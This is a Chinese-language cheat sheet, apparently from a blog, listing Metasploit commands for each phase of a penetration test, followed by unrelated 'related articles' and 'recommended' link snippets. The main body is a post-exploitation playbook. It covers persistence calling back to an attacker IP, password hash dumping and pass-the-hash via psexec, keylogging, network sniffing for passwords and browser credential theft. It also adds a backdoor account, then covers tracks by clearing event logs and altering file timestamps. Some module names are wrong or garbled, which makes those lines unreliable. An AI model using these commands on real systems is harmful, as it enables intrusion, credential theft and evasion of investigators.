信息收集阶段

Whois信息收集

msf auxiliary > whois baidu.com

域名信息查询阶段

msf auxiliary > nslookup www.baidu.com

msf auxiliary > dig @114.114.114.114 www.baidu.com



主机端口探测阶段

直接使用PING命令探测连通性

ping 1.2.3.4

msf > use auxiliary/scanner/discovery/arp_sweep

msf > set RHOSTS 1.1.1.0/24

msf > set THREADS 50

msf > run

使用NMAP探测

msf > nmap command

服务扫描打点

telnet服务:use auxiliary/scanner/telnet/telnet_version

ssh服务:use auxiliary/scanner/ssh/telnet_version

Oracle服务:use auxiliary/scanner/oracle/tnslsnr_version

http服务:use auxiliary/scanner/http/open_proxy

口令探测

ssh服务:use auxiliary/scanner/ssh/telnet_login

ftp服务:use auxiliary/sniffer/psnuffle

漏洞扫描阶段

那是nessus openVAS等的天下,可以利用PostgreSQL数据库进行联动

MSF框架下的WEB渗透

为什么不用burpsuite呢,用burpsuite更好

还有SQLMAP啊,还有好多其他的啊,啦啦啦

漏洞利用阶段

选择合适的漏洞利用payload和攻击脚本即可

use xxx

set payload xxx

强大的meterpreter

meterpreter > background 后台运行meterpreter

meterpreter > sessions 列出session,选择交互session的话 使用session -i  x

msterpreter > shell

msterpreter > cat xxxxx 查看文件

msterpreter > getwd/getlwd  获取当下路径

msterpreter > upload xxx.exe c:\  上传文件或文件夹

msterpreter > download c:\\"Program Files"\\xxx\\xxx\\xxx  ./  下载文件

msterpreter > edit 使用vi编辑器编辑目标机上的文件

msterpreter > search 搜索目标上的文件

msterpreter > ipconfig 查看网络信息

msterpreter > portfwd add -l 1234 -p 3389 -r 1.2.3.4 将目标机的3389 转发到本地1234端口

msterpreter > route 查看目标机的路由信息

msterpreter > ps  查看进程表

msterpreter > migrate 转移shell到进程

msterpreter > execute -H -f cmd.exe 隐藏执行cmd

msterpreter > execute -H -i -f cmd.exe 可以与cmd交互了 -m 参数直接在内存执行供给端的可执行文件 execute -H -m -d xxx.exe -f xxx.exe -a "-o xxxx.txt"

msterpreter > getpid 获取当前会话所在进程的pid

msterpreter > getuid /whoami 获取自己是谁

msterpreter > sysinfo  查看系统信息

msterpreter > kill 杀掉进程

msterpreter > shutdown关机

msterpreter > hashdump 获取windows 的hash口令

msterpreter > run persistence -X -i 5 -p 443 -r 192.168.10.141

msterpreter > run metsvc #吧31337端口打开监听meterpreter

msterpreter > run getgui -u metaspolit -p meterpreter 添加账户metaspolit 密码meterpreter

msterpreter > run multi_console_command -rc /root/.msf3/logs/scripts/getgui/clean_up_xxxxxxxx.xxxx.rc

msterpreter > getsystem 提权

msterpreter > run post/windows/gather/dumplinks 获取最近处理的文档

msterpreter > run post/windows/gather/enum_applications 获取安装的程序

msterpreter > keyscan_start 键盘记录

msterpreter > keyscan_dump

msterpreter > keyscan_stop 关闭

msterpreter > use sniffer #网络监听获取密码

msterpreter > sniffer_interface

msterpreter > sniffer_start 1

msterpreter > sniffer_dump 1 /tmp/xxx.pcap

msterpreter > sniffer_stop 1

msterpreter > run post/windows/gather/enum_ie 浏览器获取密码

msterpreter > run windows/gather/smart_hashdump 获取系统口令

msterpreter > run get_local_subnets 添加路由

msterpreter > background 后 route add a.b.c.d x.x.x.x 1 然后查看route print

msf > use exploit/windows/smb/psexec

msf > set RHOST RPORT LHOST ...

msf > set SMBPass hash值

msf > exploit

msterpreter > clearev 删除日志

msterpreter >timestomp 停止修改文件属性的时间记录

Metaspolit使用简介的更多相关文章

  1. 关于metaspolit中进行JAVA反序列化渗透RMI的原理分析

    一.背景: 这里需要对java反序列化有点了解,在这里得推广下自己的博客嘛,虽然写的不好,广告还是要做的.原谅我: 1.java反序列化漏洞原理研习 2.java反序列化漏洞的检测 二.攻击手法简介 ...

  2. ASP.NET Core 1.1 简介

    ASP.NET Core 1.1 于2016年11月16日发布.这个版本包括许多伟大的新功能以及许多错误修复和一般的增强.这个版本包含了多个新的中间件组件.针对Windows的WebListener服 ...

  3. MVVM模式和在WPF中的实现(一)MVVM模式简介

    MVVM模式解析和在WPF中的实现(一) MVVM模式简介 系列目录: MVVM模式解析和在WPF中的实现(一)MVVM模式简介 MVVM模式解析和在WPF中的实现(二)数据绑定 MVVM模式解析和在 ...

  4. Cassandra简介

    在前面的一篇文章<图形数据库Neo4J简介>中,我们介绍了一种非常流行的图形数据库Neo4J的使用方法.而在本文中,我们将对另外一种类型的NoSQL数据库——Cassandra进行简单地介 ...

  5. REST简介

    一说到REST,我想大家的第一反应就是“啊,就是那种前后台通信方式.”但是在要求详细讲述它所提出的各个约束,以及如何开始搭建REST服务时,却很少有人能够清晰地说出它到底是什么,需要遵守什么样的准则. ...

  6. Microservice架构模式简介

    在2014年,Sam Newman,Martin Fowler在ThoughtWorks的一位同事,出版了一本新书<Building Microservices>.该书描述了如何按照Mic ...

  7. const,static,extern 简介

    const,static,extern 简介 一.const与宏的区别: const简介:之前常用的字符串常量,一般是抽成宏,但是苹果不推荐我们抽成宏,推荐我们使用const常量. 执行时刻:宏是预编 ...

  8. HTTPS简介

    一.简单总结 1.HTTPS概念总结 HTTPS 就是对HTTP进行了TLS或SSL加密. 应用层的HTTP协议通过传输层的TCP协议来传输,HTTPS 在 HTTP和 TCP中间加了一层TLS/SS ...

  9. 【Machine Learning】机器学习及其基础概念简介

    机器学习及其基础概念简介 作者:白宁超 2016年12月23日21:24:51 摘要:随着机器学习和深度学习的热潮,各种图书层出不穷.然而多数是基础理论知识介绍,缺乏实现的深入理解.本系列文章是作者结 ...

随机推荐

  1. mysql使用sql语句查询数据库所有表注释已经表字段注释

    场景: 1. 要查询数据库 "mammothcode" 下所有表名以及表注释 /* 查询数据库 ‘mammothcode’ 所有表注释 */ SELECT TABLE_NAME,T ...

  2. mysql中explain

    1.select_type: /* select_type 使用 SIMPLE */explain select * from tb_shop_order where id='201603292570 ...

  3. Android 布局学习之——LinearLayout属性baselineAligned的作用及baseline

    相信大家对LinearLayout已经相当熟悉,但你们是否了解它的属性baselineAligned呢? Android官方文档是这么描述的:

  4. Android让文本输入框默认不获取焦点

    项目中有个检索功能,页面上有个EditText输入框,打开页面后,焦点默认在EditText上,这样的话软键盘默认就会显示出来,占据大半个屏幕. 后来想办法将这个给去掉了,原先考虑着将焦点赋给页面上的 ...

  5. MLE、MAP、贝叶斯三种估计框架

    三个不同的估计框架. MLE最大似然估计:根据训练数据,选取最优模型,预测.观测值D,training data:先验为P(θ). MAP最大后验估计:后验概率. Bayesian贝叶斯估计:综合模型 ...

  6. QT编译错误:cannot find file: *.pro

    编译一个之前同事写的QT程序,结果出现了编译错误:cannot find file: *.pro 解决方法:将程序放在英文路径下 尽管出现一些红色的编译信息部门,但是最终还算是编译成功了~

  7. 中企ITIL需软落地

    IT技术的发展对现代企业产生了深远的影响.企业信息化建设越深入,信息系统的规模越大,业务对IT系统的依赖性也越大,由此对IT服务的要求越高,如何 对繁多的IT技术进行有效的管理,最大程度地利用企业现有 ...

  8. 如何让form表单在enter键入时不提交

    今天在做我的一个小玩意 在线聊天工具的时候 form表单只有一个text和一个button每当我键入enter的时候就刷新.很是郁闷,直接在form上onsumbit=false.才行. 下面是我查询 ...

  9. 纯CSS制作的TAB选项卡

    代码 这里主要使用表单的单选按钮来实现这个TAB显示和隐藏,首页tab里的内容默认隐藏,如果单选按钮为选中状态(checked)就显示内容.具体请看下面代码. 关于兼容性,因为是用CSS3来制作的,所 ...

  10. windows下WAMP php5.x redis扩展

    其解压到php的扩展目录ext下,在php.ini文件中扩展部分增加一行:extension=php_redis.dll 新增下载地下: php5.3 http://download.csdn.net ...